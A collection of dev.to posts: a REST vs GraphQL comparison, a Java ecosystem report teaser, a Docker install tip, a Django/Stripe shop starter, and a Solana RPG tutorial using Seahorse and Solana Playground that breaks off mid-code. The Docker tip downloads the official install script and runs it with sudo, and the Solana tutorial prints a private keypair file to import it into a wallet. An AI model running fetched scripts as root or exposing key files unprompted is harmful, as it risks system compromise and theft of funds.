In the example above, the response to the request sent to the server will be an object of all data about the student with id 1.
This can sometimes take a longer time depending on the size of the data due to the over-fetching nature of REST
### GraphQL
In GraphQL, data if fetched by strictly listing the number of fields needed. This restricts fetching all data at a time. Consider the GIF below for fetching user data using graphQL.

## Things to consider when choosing between GraphQL and REST
### Security
REST API makes use of HTTP, allows encryption using Transfer Layer Security, and provides a variety of API authentication options. TLS makes assurance that data transfer between two systems is private and unaltered. Web tokens that support JavaScript Object Notation (JSON) finish the HTTP authentication process for secure data transfer from web browsers.
GraphQL's security controls are not as developed as those in the REST API. In order to make use of current features like data validation in GraphQL, developers must devise new authentication and authorization techniques.
### Usability
The REST API makes use of URI and HTTP techniques, which make it challenging for the API to anticipate what will happen when contacting a new endpoint. The lack of specified versioning requirements in REST allows providers to take their own method.
With GraphQL, you can send a request to your API and receive the precise response without the need for further additions. As a result, extremely predictable responses from GraphQL queries offer good usability. GraphQL adopts a straightforward methodology and does not version APIs.
### Performance
Developers can get data with GraphQL with just one API request. In order to avoid under- and over-fetching of data, the flexible style defines the structure of information requests and returns the same structure from the server.
REST APIs, in contrast to GraphQL, have rigid data structures that may first return irrelevant information (over-fetching). As requests take time to reach the proper data and deliver pertinent information, developers must make several calls.
### Caching
All GET endpoints for REST APIs can be cached on the server or through a CDN. They can also be stored by the client for regular use and cached by the browser. GraphQL is supplied through a single endpoint, typically (/graphql), and deviates from the HTTP spec. As a result, the queries cannot be cached the same way REST APIs can.
However, because of the available tools, caching on the client side is superior to REST. The schema and type system of GraphQL are used by some of the clients employing caching layers (Apollo Client, URQL), allowing them to keep a cache on the client side.
### Error Handling
Every GraphQL request, success or error returns a 200 status code. This is a visible difference compared to REST APIs where each
status code points to a certain type of response.
| Status Code | REST | GraphQL |
| :---: | :---: | :---: |
|200 |Ok |Ok|
|400 | Bad Request |-|
|401 | Unauthorized |-|
Errors with REST APIs can have any code other than 200, and the client handling the error should be aware of all possible codes.
Any legitimate answer in GraphQL should be 200, including data and error responses. The client side tooling will assist in managing errors more effectively. Errors are handled as part of the response body under a particular errors object.
## Conclusion
Lets take a recap of what we've discussed above.
| REST | GraphQL |
| :---: | :---: |
| An architectural style largely viewed as a conventional standard for designing APIs | A query language for solving common problems when integrating APIs |
| Simplifying work with multiple endpoints requires expensive custom middleware | Allows for schema stitching and remote data fetching |
| Doesn't offer type-safety or auto-generated documentation | Offers type-safety and auto-generated documentation |
|Response output usually in XML, JSON, and YAML | Response output in JSON|
| Supports multiple API versions | No API versioning required |
| Uses caching automatically | Lacks in-built caching mechanism |
| Deployed over a set of URLs where each of them exposes a single resource | Deployed over HTTP using a single endpoint that provides the full capabilities of the exposed service |
|Uses a server-driven architecture | Uses a client-driven architecture|
With the curefully curated differences above, I hope you will be able to choose which of the technologies to use depending on your use case.
**Happy Hacking!**

Please follow, like and share this article. It will help us lot. Thank you. | qbentil |
1,229,757 | 2022 State of Java Ecosystem Report by New Relic | Hey, Java community 👋 I’m Daniel with New Relic. I wanted to share a 2022 State of the Java... | 0 | 2022-10-25T20:05:20 | https://dev.to/newrelic/2022-state-of-java-ecosystem-report-by-new-relic-3ne8 | java, devops | Hey, Java community 👋
I’m Daniel with New Relic. I wanted to share a [2022 State of the Java Ecosystem Report](https://newrelic.com/resources/report/2022-state-of-java-ecosystem?utm_source=devto&utm_medium=community&utm_campaign=global-fy-23q3-java_community_outreach) that New Relic recently published using data gathered in January 2022 from millions of anonymized applications that provided performance data.
One highlight we found is that Java 11 is the new standard. More than 48% of applications are now using Java 11 in production with Java 8 a close second, capturing 46.45% of applications using the version in production.
The goal of this report is to provide context and insights into the state of the Java ecosystem today. The following categories were examined:
➡️ The most used version in production
➡️ The most popular vendors
➡️ The rise of containers
➡️ The most common heap size configurations
➡️ The most used garbage collection algorithms
**Take a look at more highlights and the state of the Java ecosystem [here](https://newrelic.com/resources/report/2022-state-of-java-ecosystem?utm_source=devto&utm_medium=community&utm_campaign=global-fy-23q3-java_community_outreach).**🤓
---
_Join the [New Relic Slack community](https://get.newrelic.com/MzQxLVhLUC0zMTAAAAGHlVlC-d2ZVCwNLc_hpcLD836-j2gmD6sZkxkygeaaSTPg-4QlmIY6omb5Gt1rHHzeU1xsqJc=) to continue the conversation with hundreds of other developers using New Relic._
_Not an existing New Relic user? [Sign up for a free account](https://newrelic.com/signup/?utm_source=devto&utm_medium=community&utm_campaign=global-fy23-q3-dev_to_techupdates) to get started!_
| alvaradodaniel3 |
1,229,974 | GoodBye Webpack and Hello turbopack | I will write about TurboPack | 0 | 2022-10-25T20:38:02 | https://dev.to/praneethkumarpidugu/bye-bye-webpack-and-hello-turbopack-204m | turbopack, nextjs, vercel, webdev | I will write about TurboPack | praneethkumarpidugu |
1,229,985 | Install Docker engine to a development Linux box - easy way | This method should only be used in development boxes not in production scenarios according to docker... | 0 | 2022-10-25T21:21:31 | https://dev.to/paul8989/install-docker-engine-to-a-development-linux-box-easy-way-180j | This method should only be used in development boxes not in production scenarios according to docker official documentation. Also validate the script before executing. You should not run this script to upgrade your existing docker engine, it may cause issues.
` curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh`
I found it really easy to get up and running for testing with docker on my raspberry pi4 running on Ubuntu 20.04.
References:
https://docs.docker.com/engine/install/ubuntu/ | paul8989 | |
1,230,263 | Learning about SSG features with Docusarus | This week I worked with Docasaurus to learn about another popular SSG to improve my SSG. ... | 20,715 | 2022-10-27T02:54:53 | https://dev.to/pdr0zd/learning-about-ssg-features-with-docusarus-146e | This week I worked with Docasaurus to learn about another popular SSG to improve my SSG.
# Installing Docasaurus
Docasaurus wasn't to difficult to install and allows you to edit a document and immediately see the changes online. Setting it up was as simple as using the ```npm init docusaurus@latest my-website classic``` Replacing my-website with the name of your site. After wards I uploaded my Docasaurus site on GitHub Pages. [Page](https://p-dr0zd.github.io/pdrozdSSG-Docusaurus/)
# Features I Added
[eefb760](https://github.com/P-DR0ZD/pdrozd-ssg/commit/eefb760a5620a5ee753c23b25800561e46333c0f)
[Issue Markdown](https://github.com/P-DR0ZD/pdrozd-ssg/issues/14)
Full Markdown Support Complete Markdown Support with the Help of [Python-Markdown/markdown](https://github.com/Python-Markdown/markdown) I wanted to finally Add full markdown support.
[Issue Tags](https://github.com/P-DR0ZD/pdrozd-ssg/issues/15)
HTML Tags. I added Meta Tags for Description and tags for Robots which tells search engines which pages to show and not show.
# Whats Next
Next I want to add
- Choosing Output Directory
- CSS support
| pdr0zd | |
1,230,448 | Chapter 14. Installing and Updating Software Packages | A. Mendaftarkan Sistem untuk Dukungan Red Hat Manajemen Berlangganan Red Hat Ada empat tugas... | 0 | 2022-10-26T05:27:21 | https://dev.to/nurulkhofifaaenun/chapter-14-installing-and-updating-software-packages-4ai | **A. Mendaftarkan Sistem untuk Dukungan Red Hat**
Manajemen Berlangganan Red Hat
Ada empat tugas dasar yang dilakukan dengan alat Manajemen Langganan Red Hat:
1).Daftarkan sistem untuk mengaitkan sistem itu ke akun Red Hat. Sehingga Pengelola Langganan untuk menginventarisasi sistem secara unik. Jika sudah tidak digunakan, sistem mungkin tidak terdaftar.
2).Berlangganan sistem untuk memberinya hak atas pembaruan untuk produk Red Hat yang dipilih. Langganan memiliki tingkat dukungan, tanggal kedaluwarsa, dan repositori default tertentu. Alat tersebut dapat digunakan untuk melampirkan otomatis atau memilih hak tertentu. Saat kebutuhan berubah, langganan dapat dihapus.
3).Aktifkan repositori untuk menyediakan paket perangkat lunak. Beberapa repositori diaktifkan secara default dengan setiap langganan, tetapi repositori lain seperti pembaruan atau kode sumber dapat diaktifkan atau dinonaktifkan sesuai kebutuhan.
4).Tinjau dan lacak hak yang tersedia atau digunakan. Informasi langganan dapat dilihat secara lokal pada sistem tertentu atau, untuk suatu akun, baik di halaman Langganan Portal Pelanggan Red Hat atau Manajer Aset Berlangganan (SAM).
Mendaftarkan Sistem
Cara berbeda lainnya untuk mendaftarkan sistem ke Portal Pelanggan Red Hat. Ada antarmuka grafis yang dapat Anda akses dengan aplikasi GNOME atau melalui layanan Konsol Web, dan ada alat baris perintah. Untuk mendaftarkan sistem dengan aplikasi GNOME, luncurkan Red Hat Subscription Manager dengan memilih Aktivitas . Ketik subscription di kolom Type to search... dan klik Red Hat Subscription Manager . Masukkan kata sandi yang sesuai saat diminta untuk mengautentikasi. Untuk mendaftarkan sistem, klik tombol Daftar di jendela Langganan .
Saat terdaftar, sistem secara otomatis memiliki langganan yang terpasang jika tersedia.Setelah sistem terdaftar dan langganan telah ditetapkan, tutup jendela Langganan . Sistem sekarang berlangganan dengan benar dan siap menerima pembaruan atau menginstal perangkat lunak baru dari Red Hat.
Pendaftaran dari Baris Perintah
1. Daftarkan sistem ke akun Red Hat:
[user@host ~]$ subscription-manager register --username=yourusername \
--password=yourpassword
2. Lihat langganan yang tersedia:
[user@host ~]$ subscription-manager list --available | less
3. Lampirkan langganan secara otomatis:
[user@host ~]$ subscription-manager attach --auto
4. Atau, lampirkan langganan dari kumpulan tertentu dari daftar langganan yang tersedia:
[user@host ~]$ subscription-manager attach --pool=poolID
5. Lihat langganan yang dikonsumsi:
[user@host ~]$ subscription-manager list --consumed
6. Membatalkan pendaftaran sistem:
[user@host ~]$ subscription-manager unregister
**B. Menjelaskan dan Menyelidiki Paket Perangkat Lunak RPM
Tujuan**
Paket perangkat lunak dan RPM
RPM Package Manager menyediakan cara standar untuk mengemas perangkat lunak untuk distribusi. Ini jauh lebih sederhana dari pada bekerja dengan perangkat lunak yang hanya diekstraksi ke dalam sistem file dari arsip. Sehingga administrator melacak file mana yang diinstal oleh paket perangkat lunak dan mana yang perlu dihapus jika dihapus, dan memeriksa untuk memastikan bahwa paket pendukung ada saat diinstal.
Informasi tentang paket yang diinstal disimpan dalam database RPM lokal di setiap sistem. Semua perangkat lunak yang disediakan oleh Red Hat untuk Red Hat Enterprise Linux disediakan sebagai paket RPM. Nama file paket RPM terdiri dari empat elemen (ditambah .rpmakhiran): name-version-release.architecture:
1. NAME adalah satu atau lebih kata yang menjelaskan isi (coreutils).
2. VERSION adalah nomor versi perangkat lunak asli (8.30).
3. RELEASE adalah nomor rilis paket berdasarkan versi tersebut, dan ditetapkan oleh pembuat paket, yang mungkin bukan pengembang perangkat lunak asli (4.el8).
4. ARCH adalah arsitektur prosesor paket yang dikompilasi untuk dijalankan. noarchmenunjukkan bahwa isi paket ini tidak spesifik arsitektur (berlawanan dengan x86_64untuk 64-bit, aarch64untuk ARM 64-bit, dan seterusnya).
Memperbarui Perangkat Lunak dengan Paket RPM
Red Hat tidak mengharuskan paket yang lebih lama diinstal dan kemudian ditambal. Untuk memperbarui perangkat lunak, RPM menghapus versi paket yang lebih lama dan menginstal versi baru. Pembaruan biasanya menyimpan file konfigurasi, tetapi pemaket versi baru mendefinisikan perilaku yang tepat.
Memeriksa Paket RPM
Utilitas rpm adalah alat tingkat rendah yang dapat memperoleh informasi tentang isi file paket dan paket yang diinstal. Ia mendapat informasi dari database lokal paket yang diinstal. Namun, dapat menggunakan -p opsi untuk menentukan jika ingin mendapatkan informasi tentang file paket yang diunduh.
- Bentuk umum dari query adalah:
rpm -q [pilihan-pilihan] [pilihan-permintaan]
- Kueri RPM: Informasi umum tentang paket yang diinstal
rpm -qa : Daftar semua paket yang diinstal
rpm -qf FILENAME: Cari tahu paket apa yang menyediakan
FILENAME

- Kueri RPM: Informasi tentang paket tertentu
rpm -q : Cantumkan versi paket yang saat ini diinstal

- rpm -qi : Dapatkan informasi rinci tentang paket
- rpm -ql : Daftar file yang diinstal oleh paket

- rpm -qc : Daftar hanya file konfigurasi yang diinstal oleh paket

- rpm -qd : Daftar hanya file dokumentasi yang diinstal oleh paket

- rpm -q --scripts : Daftar skrip shell yang berjalan sebelum atau setelah paket diinstal atau dihapus

- rpm -q --changelog : daftar informasi perubahan untuk paket

Meminta file paket lokal :

Memasang Paket RPM
Perintah rpm dapat digunakan untuk menginstal paket RPM yang telah diunduh ke direktori lokal.

Ringkasan Perintah Permintaan RPM
Paket yang diinstal dapat ditanyakan langsung dengan perintah rpm . Tambahkan -p opsi untuk menanyakan file paket sebelum instalasi.

**C. Menginstal dan Memperbarui Paket Perangkat Lunak dengan Yum**
Mengelola Paket Perangkat Lunak dengan Yum
Yum dirancang untuk menjadi sistem yang lebih baik untuk mengelola instalasi dan pembaruan perangkat lunak berbasis RPM. Perintah yum digunakan untuk menginstal, memperbarui, menghapus, dan mendapatkan informasi tentang paket perangkat lunak dan dependensinya.
Menemukan Perangkat Lunak dengan Yum
- yum help menampilkan informasi penggunaan.
- yum list menampilkan paket yang diinstal dan tersedia.

- yum search KEYWORD daftar paket dengan kata kunci yang ditemukan di bidang nama dan ringkasan saja.
Untuk mencari paket yang memiliki " server web " di bidang nama, ringkasan, dan deskripsi, gunakan search all :

- yum info PACKAGENAME mengembalikan informasi rinci tentang sebuah paket, termasuk ruang disk yang diperlukan untuk instalasi.
Untuk mendapatkan informasi tentang Apache HTTP Server:

- yum provides PATHNAME menampilkan paket yang cocok dengan nama jalur yang ditentukan (yang sering kali menyertakan karakter wildcard).
Untuk menemukan paket yang menyediakan /var/www/htmldirektori, gunakan:

Menginstal dan menghapus perangkat lunak dengan yum
- yum install PACKAGENAME memperoleh dan menginstal paket perangkat lunak, termasuk dependensi apa pun.


- yum update PACKAGENAME memperoleh dan menginstal versi yang lebih baru dari paket yang ditentukan, termasuk dependensi apa pun. Umumnya proses mencoba untuk mempertahankan file konfigurasi di tempat, tetapi dalam beberapa kasus, mereka dapat diganti namanya jika pembuat paket berpikir yang lama tidak akan berfungsi setelah pembaruan. Tanpa PACKAGENAME yang ditentukan, ia menginstal semua pembaruan yang relevan.

- yum remove PACKAGENAME menghapus paket perangkat lunak yang diinstal, termasuk paket yang didukung.

Menginstal dan menghapus grup perangkat lunak dengan yum
yum juga memiliki konsep grup , yang merupakan kumpulan perangkat lunak terkait yang diinstal bersama untuk tujuan tertentu. Di Red Hat Enterprise Linux 8, ada dua jenis grup. Grup reguler adalah kumpulan paket. Kelompok lingkungan adalah kumpulan dari kelompok biasa. Paket atau grup yang disediakan oleh grup mungkin: mandatory(mereka harus diinstal jika grup diinstal), default(biasanya diinstal jika grup diinstal), atau optional(tidak diinstal saat grup diinstal, kecuali jika diminta secara khusus).
Seperti yum list , perintah yum group list menunjukkan nama grup yang diinstal dan tersedia.

Beberapa grup biasanya diinstal melalui grup lingkungan dan disembunyikan secara default. Daftarkan grup tersembunyi ini dengan perintah yum group list hidden .
- yum group info menampilkan informasi tentang grup. Ini termasuk daftar nama paket wajib, default, dan opsional.

- yum group install menginstal grup yang menginstal paket wajib dan default serta paket yang mereka andalkan.

Melihat riwayat transaksi
- Semua transaksi instal dan hapus sudah login /var/log/dnf.rpm.log.

- yum history menampilkan ringkasan transaksi pemasangan dan penghapusan.

- Opsi history undo membalikkan transaksi

**D. Mengaktifkan Repositori Perangkat Lunak Yum**
Mengaktifkan repositori perangkat lunak Red Hat
Mendaftarkan sistem ke layanan manajemen langganan secara otomatis mengonfigurasi akses ke repositori perangkat lunak berdasarkan langganan terlampir. Untuk melihat semua repositori yang tersedia:

Perintah yum config-manager dapat digunakan untuk mengaktifkan atau menonaktifkan repositori. Untuk mengaktifkan repositori, perintah mengatur enabledparameter ke 1. Misalnya, perintah berikut mengaktifkan rhel-8-server-debug-rpmsgudang:

Membuat Repositori Yum
Buat repositori Yum dengan perintah yum config-manager . Perintah berikut membuat file bernama /etc/yum.repos.d/dl.fedoraproject.org_pub_epel_8_Everything_x86_64_.repodengan output yang ditampilkan.

Ubah file ini untuk memberikan nilai dan lokasi kunci GPG yang disesuaikan. Kunci disimpan di berbagai lokasi di situs repositori jarak jauh, seperti, http://dl.fedoraproject.org/pub/epel/RPM-GPG-KEY-EPEL-8. Administrator harus mengunduh kunci ke file lokal daripada mengizinkan yum mengambil kunci dari sumber eksternal. Sebagai contoh:

Paket Konfigurasi RPM untuk Repositori Lokal
Perintah berikut menginstal paket repositori Red Hat Enterprise Linux 8 EPEL:

File konfigurasi sering kali mencantumkan beberapa referensi repositori dalam satu file. Setiap referensi repositori dimulai dengan nama satu kata dalam tanda kurung siku.

**E. Mengelola Aliran Modul Paket**
Mengelola modul menggunakan Yum
Untuk menangani konten modular, perintah yum module telah ditambahkan. Jika tidak, yum bekerja dengan modul seperti halnya dengan paket biasa.
Untuk menampilkan daftar modul yang tersedia, gunakan yum module list :

Untuk membuat daftar aliran modul untuk modul tertentu dan mengambil statusnya:

Untuk menampilkan detail modul:

Instal modul menggunakan aliran dan profil default:

Untuk memverifikasi status aliran modul dan profil yang diinstal:

Untuk menghapus modul yang diinstal:

Setelah modul dihapus, aliran modul masih diaktifkan. Untuk memverifikasi aliran modul masih diaktifkan:

Untuk menonaktifkan aliran modul:

Beralih Aliran Modul
Untuk membuat daftar paket yang diinstal dari modul, pada contoh di bawah modul postgresql:9.6 diinstal:

Hapus paket yang terdaftar dari perintah sebelumnya. Tandai profil modul yang akan dicopot pemasangannya.

Setelah menghapus profil modul, setel ulang aliran modul. Gunakan perintah reset modul yum untuk mengatur ulang aliran modul.

Untuk mengaktifkan aliran modul yang berbeda dan menginstal modul:

| nurulkhofifaaenun | |
1,230,514 | Free Django eCommerce - Use Products from Stripe | Mini eCommerce for Django with products download from Stripe - Open-source project (MIT License). | 0 | 2022-10-26T07:43:49 | https://blog.appseed.us/django-ecommerce-download-products-from-stripe/ | webdev, ecommerce, django, stripe | ---
title: Free Django eCommerce - Use Products from Stripe
published: true
description: Mini eCommerce for Django with products download from Stripe - Open-source project (MIT License).
tags: webdev, ecommerce, django, stripe
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wmgibre8nh5u5lzhaj79.jpg
canonical_url: https://blog.appseed.us/django-ecommerce-download-products-from-stripe/
---
Hello coders!
This article presents an open-source [Django & Stripe Mini eCommerce](https://github.com/app-generator/sample-django-stripe) starter that builds product pages using the information saved in Stripe Dashboard. Once the `Stripe` Secrets are provided in the .env file, the superusers are able to pull the products from Stripe and edit the information via a simple UI. The sources, released under the MIT License, can be used in commercial projects and eLearning activities. `Thanks for reading!`
- 👉 [Django & Stripe eCommerce](https://github.com/app-generator/sample-django-stripe) - `source code`
- 🚀 Free [support](https://appseed.us/support/) via Email & Discord (just in case)
{% embed https://www.youtube.com/watch?v=qP3QGkvBq74 %}
---
## ✨ How it works
The sources come with a default product, saved in the local filesystem. If the user initiates the purchase, the application warns that the Stripe Secrets are not provided and the flow cannot continue. The steps, as explained in the video, are the following:
> 👉 **Step #1** - Clone the source code from the [public repository](https://github.com/app-generator/sample-django-stripe)
```bash
$ git clone https://github.com/app-generator/sample-django-stripe.git
$ cd sample-django-stripe
```
---
> 👉 **Step #2** - Follow up the usual set up for a Django Project
```bash
$ python -m venv env
$ source env/bin/activate
$ pip install -r requirements.txt
```
---
> 👉 **Step #3** - Migrate the database & Create a Superuser
```bash
$ python manage.py migrate # migrate DB
$ python manage.py createsuperuser # create the app King
```
---
> 👉 **Step #4** - Create `.env` file in the root of the project
```env
DEBUG=True
SECRET_KEY=WhateEver_KEY
STRIPE_SECRET_KEY=<FROM_STRIPE> # <-- MANDATORY
STRIPE_PUBLISHABLE_KEY=<FROM_STRIPE> # <-- MANDATORY
# Server Address (used by Stripe callback)
# Should be the URL used to start the APP
DOMAIN_URL=http://localhost:8000/
```
The most important settings are the Stripe Secrets that will authorize the payment flow using Stripe as the payment provider. The values can be found on your Stripe Dashboard and the newcomers should use the "TEST" mode during the tests.
Once the `env` file is edited and saved, we can safely start the project and import the data from Stripe using a simple UI.
---
> 👉 **Stripe Dashboard** - With Three products defined

---
Before import, the app warns the users to authenticate and add more products using a superuser account.

---
In the page, reserved for superusers, if the configuration is correct, the information from Stripe becomes available and editable.

---
For each product, all product fields are editable using a minimal UI: price, name, description, and IMAGES. A live payment flow should look like this:

---
The sample used in the video demonstration can be found on GitHub with all the products already downloaded from Stripe:
{% embed https://github.com/app-generator/mini-ecomm %}
---
> `Thanks for reading!` For more tools and support feel free to access:
- 👉 More [Developer Tools](https://appseed.us/developer-tools/) provided by `AppSeed`
- 👉 Free [support](https://appseed.us/support/) via Email & Discord (just in case)
| sm0ke |
1,230,532 | Build an RPG game on Solana | Dungeon3: Demo Click on the image to watch the Demo or click Here. ... | 0 | 2022-10-26T16:35:57 | https://dev.to/aeither/build-an-rpg-game-on-solana-45he | solana, kaboom, thirdweb, react | ## Dungeon3: Demo
[](https://youtu.be/VEt2Kg1jjBc)
Click on the image to watch the Demo or click [Here](https://youtu.be/VEt2Kg1jjBc).
## Overview
Solana is one of the most exciting layer 1 blockchain platforms. Unlike Ethereum, its consensus is achieved by using proof of stake and proof of history. The code deployed on the chain is called a program. In Ethereum, they are called smart contracts. They took a different approach, which means we also need to learn new logic to build on Solana. Building on Solana is hard. It is well known by Solana builders as "chewing glass."
There is no need to be concerned. In this guide, we will build an RPG game on Solana. We will cover the complete stack of the app by breaking down each step: the program, the nft collection drop, the frontend, and the game.
We are going to start with the program which allows the user to store the in-game progress on-chain. We will use a beginner-friendly programming language, Python. It is possible thanks to the new Seahorse framework that we are going to use with the Solana Playground Web editor. We created an NFT collection drop. All the players can mint their free NFT to get started with the game. Then we are going to use kaboomjs to create the game. It is a game library by Replit that allows us to use Javascript to build browser games, so you don't have to download any game engine such as Unity to build a game.
The tools we will cover include:
### Solana
Solana is well known to be fast and cheap. It provides the web3js SDK, CLI, Solana Program Library (SPL), or interfaces to query the Solana Network. We can write programs in Rust the traditional way or in Anchor. [Read more](https://solana.com/news/getting-started-with-solana-development)
Rust has a steep learning curve, which makes it difficult for newcomers to build on Solana. Don't worry because we are going to build the program with the brand new Seahorse language. It lets you write Solana programs in Python. Developers gain Python's ease-of-use while still having the same safety guarantees as every Rust program on the Solana chain. [Seahorse Website](https://seahorse-lang.org/)
### Thirdweb
Thirdweb simplifies the Solana development workflow with an intuitive dashboard and SDKs to deploy and interact with your programs. [Thirdweb website](https://thirdweb.com/)
### Kaboom
Kaboom is a Javascript game programming library that helps you make games fast and fun. Building games in the browser has never been so easy thanks to Kaboom from Replit. [Github](https://github.com/replit/kaboom)
A quick peek of the repository structure
```
📦 dungeon3
├─ art_layers // Layers of PNGs to be use with Hashlips Engine
├─ program // Solana program to save player progress and typescript tests
├─ src
│ ├─ component
│ │ └─ kaboom // The RPG game
│ ├─ contexts // Wallet provider contex
│ ├─ hooks // Web3 methods and utilities
│ ├─ utils // Constants and the program IDL
│ ├─ App.tsx // The game page
│ └─ MintPage
└─ public
└─ assets // Game audios and images
```
Let's go!
## Prerequisites
- Install [Node.js](https://nodejs.org/en/)
- Basic familiarity with javascript and python.
## Setup
_Skip whatever step that you have already done before._
Install the [Solana Tool Suite](https://docs.solana.com/cli/install-solana-cli-tools#use-solanas-install-tool)to interact with a Solana cluster. We will use its command-line interface, also known as the CLI. It provides the most direct, flexible, and secure access to your Solana accounts. After the installation, you may need to expose the path by copy-pasting the script that will show up in your terminal. Check the version to verify you have installed it correctly.
```text
$ solana --version
solana-cli 1.13.0 (src:devbuild; feat:2324890699)
```
Let's use the CLI to generate a keypair. A keypair is a public key and corresponding private key for accessing an account. The public key is your address that you can share with your friends to receive funds, and it is visible to them when you give them assets. You must keep your private key secret. It allows anyone with it to move any assets.
Generate a new keypair with:
```text
solana-keygen new
```
It will write a JSON file to the keypair path on your computer. The file contains an array of bytes. A byte is just a number from 0-255. You can find the path by running.
```text
$ solana config get
Config File: /Users/USERNAME/.config/solana/cli/config.yml
RPC URL: https://api.devnet.solana.com
WebSocket URL: wss://api.devnet.solana.com/ (computed)
Keypair Path: /Users/USERNAME/.config/solana/id.json
Commitment: confirmed
```
We can check the address and balance with the respective keywords.
```text
solana address
```
and
```text
solana balance
```
To get a few SOL for testing, we use the airdrop command. Currently, the maximum SOL per call is set at 2 SOL. We can get more by calling more times if needed.
```text
solana airdrop 2
```
We are not going to use the localnet so make sure the RPC URL is set to devnet with
```text
solana config set --url devnet
```
Run `cat` with the file path to display its content. We can copy-paste it to import it into Phantom Wallet. In this way, we don't use our main wallet.
```text
cat /Users/USERNAME/.config/solana/id.json
```
Now that we have setup our wallet, the next step is to create the program to store game data on the blockchain.
## The Program

### Introducing Seahorse
There are 3 frameworks we can use to create a Solana program. The local, the anchor, or the recently arrived seahorse Right now, the most commonly used framework is Anchor as it is observable on GitHub and in the open source repository of the best known protocols. Anchor abstracts huge parts of the native way of life, but it is still using Rust.
Rust is known for being slow because of the high learning curve and the writing speed due to the very verbose code, which also makes it hard to read. It is complex, which means the barrier to entry for development is high. This slows development down and stunts innovation within the ecosystem.
Solehorse lets you write Solana programs in Python. It is a community-led project built on Anchor. fully interoperable with Rust code. Compatibility with the Anchor It is not production ready as it is still in beta, which means there are bugs and limitations. Nevertheless, we are going to explore its simplicity and its potential.
### Program breakdown
Head to [Solana Playground](https://beta.solpg.io/) and click on the plus sign to create a new project. Give it the name `dungeon3`, select the last option Seahorse(Python), and press the create button. Change the name of `fizzbuzz.py` to `dungeon.py` and paste the following code.
```python
# calculator
# Built with Seahorse v0.2.1
from seahorse.prelude import *
# This is your program's public key and it will update
# automatically when you build the project.
declare_id('11111111111111111111111111111111');
class UserAccount(Account):
authority: Pubkey
score: u64
map: u8
health: u8
class ItemAccount(Account):
authority: Pubkey
id: u8
quantity: u64
exports: u8
@instruction
def init_user(authority: Signer, new_user_account: Empty[UserAccount]):
user_account = new_user_account.init(
payer=authority, seeds=['user', authority])
user_account.authority = authority.key()
user_account.score = 0
user_account.map = 0
user_account.health = 0
@instruction
def init_item(authority: Signer, new_item_account: Empty[ItemAccount], id: u8):
item_account = new_item_account.init(
payer=authority, seeds=['item', authority, id])
item_account.authority = authority.key()
item_account.id = id
item_account.quantity = 0
item_account.exports = 0
@instruction
def set_user(authority: Signer, user_account: UserAccount, score: u64, map: u8, health: u8):
assert authority.key() == user_account.authority, "signer must be user account authority"
user_account.score = score
user_account.map = map
user_account.health = health
@instruction
def add_item(authority: Signer, item_account: ItemAccount):
assert authority.key() == item_account.authority, "signer must be user account authority"
item_account.quantity = item_account.quantity + 1
@instruction
def export_items(authority: Signer, item_account: ItemAccount):
assert authority.key() == item_account.authority, "signer must be user account authority"
item_account.quantity = 0
item_account.exports = item_account.exports + 1
```
Let's see what we are doing here. The first line imports class and function definitions to provide editors with autocompletion and serve as documentation.
```python
from seahorse.prelude import *
```
`Declare_id` is the program's public key.
```python
# This is your program's public key and it will update
# automatically when you build the project.
declare_id('11111111111111111111111111111111');
```
We derive the base `account` type to make program accounts. We created 2 accounts. The first one is the UserAccount to store the user's progress; the second one is the ItemAccount to record user items that can be exported as NFT.
```python
class UserAccount(Account):
authority: Pubkey
score: u64
map: u8
health: u8
```
With the @instruction decorator, we convert a function to an instruction. If you have used Anchor, you should know accounts are separated and put into an account context struct. In Seahorse we don't have the account context. The parameters of an instruction can include both accounts and regular parameters.
We passed in a Signer, the wallet that signed the transaction with this instruction call. It is often used as an account payer or seed.
For the second account, `new_user_account` We wrap the account with `Empty` to indicate it will be initialized by this instruction. The `payer` indicates who is going to pay for the rent. On Solana, all accounts need to pay a fee for allocating space for account data. It is rent exempt if initiated with an amount equal to more than 2 years of rent. That amount is recoverable if we close the account, but that is out of scope of the goal of this tutorial. The seeds allow us to generate the account address deterministically. Once initiated, we set the default values.
```python
@instruction
def init_user(authority: Signer, new_user_account: Empty[UserAccount]):
user_account = new_user_account.init(
payer=authority, seeds=['user', authority])
user_account.authority = authority.key()
user_account.score = 0
user_account.map = 0
user_account.health = 0
```
Switch to the second tab in Solana Playground. Make a copy of your address and fund it.

```text
$ solana airdrop 2 <YOUR_ADDRESS>
```
Click on build and then on deploy to send the program to the devnet. Open "Program Credentials" and copy the program ID. Save it somewhere as it is required as an environment variable for the frontend.

Now it is time to test the program.
### Testing
In the third tab, we can play around with the program. It is divided into two sections: Instructions and Accounts. In the first section, you can call all the available functions by passing the required accounts and arguments. In the second section, you can fetch the accounts data.

We can also automate the testing with a test file that you can find under the Client section back in the file explorer tab.

You can try to write your own tests first. It is pretty straightforward. The editor comes with autocompletion, which helps us to understand what we can use. There is already an example there from the fizzbuzz program. Otherwise, you can paste mine.
```ts
// No imports needed: web3, anchor, pg and more are globally available
describe("Test", async () => {
// Generate the account public key from its seeds
const [userAccountAddress] = await web3.PublicKey.findProgramAddress(
[Buffer.from("user"), pg.wallet.publicKey.toBuffer()],
pg.PROGRAM_ID
);
it("init user", async () => {
// Send transaction
const txHash = await pg.program.methods
.initUser()
.accounts({
newUserAccount: userAccountAddress,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
// Confirm transaction
await pg.connection.confirmTransaction(txHash);
// Fetch the account
const userAccount = await pg.program.account.userAccount.fetch(
userAccountAddress
);
console.log("Score: ", userAccount.score.toString());
console.log("Health: ", userAccount.health);
});
it("set user", async () => {
// Send transaction
const txHash = await pg.program.methods
.setUser(new BN(15000), 0, 1)
.accounts({
userAccount: userAccountAddress,
})
.rpc();
console.log(`Use 'solana confirm -v ${txHash}' to see the logs`);
// Confirm transaction
await pg.connection.confirmTransaction(txHash);
// Fetch the account
const userAccount = await pg.program.account.userAccount.fetch(
userAccountAddress
);
console.log("Score: ", userAccount.score.toString());
console.log("Health: ", userAccount.health);
});
});
```
`userAccountAddress` is a PDA or program-derived account generated from the seeds that we passed when we initiated the account. PDAs do not have private keys, so they can live securely on a chain.
First we invoke the method iniUser. There are no arguments passed to initUser(). Then we pass the accounts that the instruction will interact with. In this case, the user account address. We can notice that authority, `systemProgram,` and rent are also accounts that the instruction interacts with, therefore requiring them, but we omitted them without problem. That is because there are variables that Anchor can infer, so they are optional.
```ts
const txHash = await pg.program.methods
.initUser()
.accounts({
